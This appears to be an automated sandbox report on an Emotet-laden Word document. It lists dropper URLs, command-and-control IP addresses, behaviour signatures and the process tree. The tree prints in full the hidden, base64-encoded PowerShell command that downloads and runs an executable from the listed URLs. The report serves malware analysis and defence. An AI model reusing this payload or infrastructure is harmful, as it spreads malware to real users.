Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    19-12-2019 13:18

General

  • Target

    1612cd9b94f1c335969ff73c085dceadf11615bc296caea41c9628fbab30d5e2

  • Sample

    191219-ba5z9dgrc2

  • SHA256

    1612cd9b94f1c335969ff73c085dceadf11615bc296caea41c9628fbab30d5e2

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://siberiankatalog.com/wp-admin/ntaan872/

exe.dropper

http://profitcoach.net/wp-includes/5s419/

exe.dropper

https://alwatania-co.com/cgi-bin/b38983/

exe.dropper

https://www.icelp.info/wp-includes/uzxgqpu52588/

exe.dropper

http://registro.mibebeyyo.com/application/gbvwde29/

Extracted

Family

emotet

C2

63.248.198.8:80

189.19.81.181:443

130.204.247.253:80

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

51.255.165.160:8080

118.36.70.245:80

190.210.184.138:995

188.135.15.49:80

139.162.118.88:8080

72.29.55.174:80

68.183.170.114:8080

181.231.62.54:80

192.241.146.84:8080

71.76.45.83:443

63.246.252.234:80

37.211.49.127:80

74.59.187.94:80

5.88.27.67:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1612cd9b94f1c335969ff73c085dceadf11615bc296caea41c9628fbab30d5e2.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4956
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABVAHoAagBhAGMAZwByAHUAdQA9ACcAUgBsAHYAZgB4AHcAYgB2AHUAawBoAGkAJwA7ACQAQQBuAHkAcgB4AHkAcwBkAGoAbABqAG0AIAA9ACAAJwAyADgAMgAnADsAJABaAHEAYgBzAHoAaQBkAHEAaAB6AHgAcAA9ACcAQQBnAHQAbgB4AGYAbgB4AHgAJwA7ACQARABpAHUAYwB5AGIAeQBnAHAAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHkAcgB4AHkAcwBkAGoAbABqAG0AKwAnAC4AZQB4AGUAJwA7ACQASAByAGUAdwBuAHEAYwBmAGsAZwBhAD0AJwBNAGwAbwB1AG8AZwB6AGgAJwA7ACQAUgBoAHEAaABuAHgAYQBzAGwAPQAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAQwBsAGkAZQBuAFQAOwAkAEYAaQByAHQAeQBsAGYAeQB1AG8AdQA9ACcAaAB0AHQAcABzADoALwAvAHMAaQBiAGUAcgBpAGEAbgBrAGEAdABhAGwAbwBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHQAYQBhAG4AOAA3ADIALwAqAGgAdAB0AHAAOgAvAC8AcAByAG8AZgBpAHQAYwBvAGEAYwBoAC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA1AHMANAAxADkALwAqAGgAdAB0AHAAcwA6AC8ALwBhAGwAdwBhAHQAYQBuAGkAYQAtAGMAbwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGIAMwA4ADkAOAAzAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBpAGMAZQBsAHAALgBpAG4AZgBvAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdQB6AHgAZwBxAHAAdQA1ADIANQA4ADgALwAqAGgAdAB0AHAAOgAvAC8AcgBlAGcAaQBzAHQAcgBvAC4AbQBpAGIAZQBiAGUAeQB5AG8ALgBjAG8AbQAvAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGcAYgB2AHcAZABlADIAOQAvACcALgAiAFMAYABwAGwASQBUACIAKAAnACoAJwApADsAJABVAGUAbgB1AGoAcABmAGMAdABwAGUAPQAnAFkAdAB0AGkAdgBrAGIAeQB6AG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBkAG0AcQBnAG0AbAB2AGcAegByAHIAcwAgAGkAbgAgACQARgBpAHIAdAB5AGwAZgB5AHUAbwB1ACkAewB0AHIAeQB7ACQAUgBoAHEAaABuAHgAYQBzAGwALgAiAEQATwBXAGAATgBsAG8AYABBAEQARgBJAGAAbABlACIAKAAkAEUAZABtAHEAZwBtAGwAdgBnAHoAcgByAHMALAAgACQARABpAHUAYwB5AGIAeQBnAHAAbwApADsAJABRAHQAaQBxAG0AZwByAGIAawBzAD0AJwBTAHEAZQBlAGgAZAB4AHUAdQBwAGEAdgB5ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQARABpAHUAYwB5AGIAeQBnAHAAbwApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAyADkAOQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABhAGAAUgB0ACIAKAAkAEQAaQB1AGMAeQBiAHkAZwBwAG8AKQA7ACQAUgB1AHIAdwB0AHgAeQBtAHUAYwBjAD0AJwBQAG8AYgB1AG0AYwB0AHgAJwA7AGIAcgBlAGEAawA7ACQASQB1AGcAcgBiAHMAbgBzAGkAagBjAGoAPQAnAEQAYwB2AHMAcgBqAGUAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGIAeQBiAG0AYgBkAHIAeABjAGkAYgA9ACcAWAB0AGgAawB0AG4AeABmAHkAJwA=
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4608
    • C:\Users\Admin\282.exe
      "C:\Users\Admin\282.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:3744
      • C:\Users\Admin\282.exe
        --fdf7f48a
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        PID:4192

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\282.exe
  • C:\Users\Admin\282.exe
  • C:\Users\Admin\282.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • memory/3744-11-0x0000000002240000-0x0000000002257000-memory.dmp
    Filesize

    92KB

  • memory/4192-14-0x0000000002100000-0x0000000002117000-memory.dmp
    Filesize

    92KB

  • memory/4192-15-0x0000000000400000-0x0000000000452000-memory.dmp
    Filesize

    328KB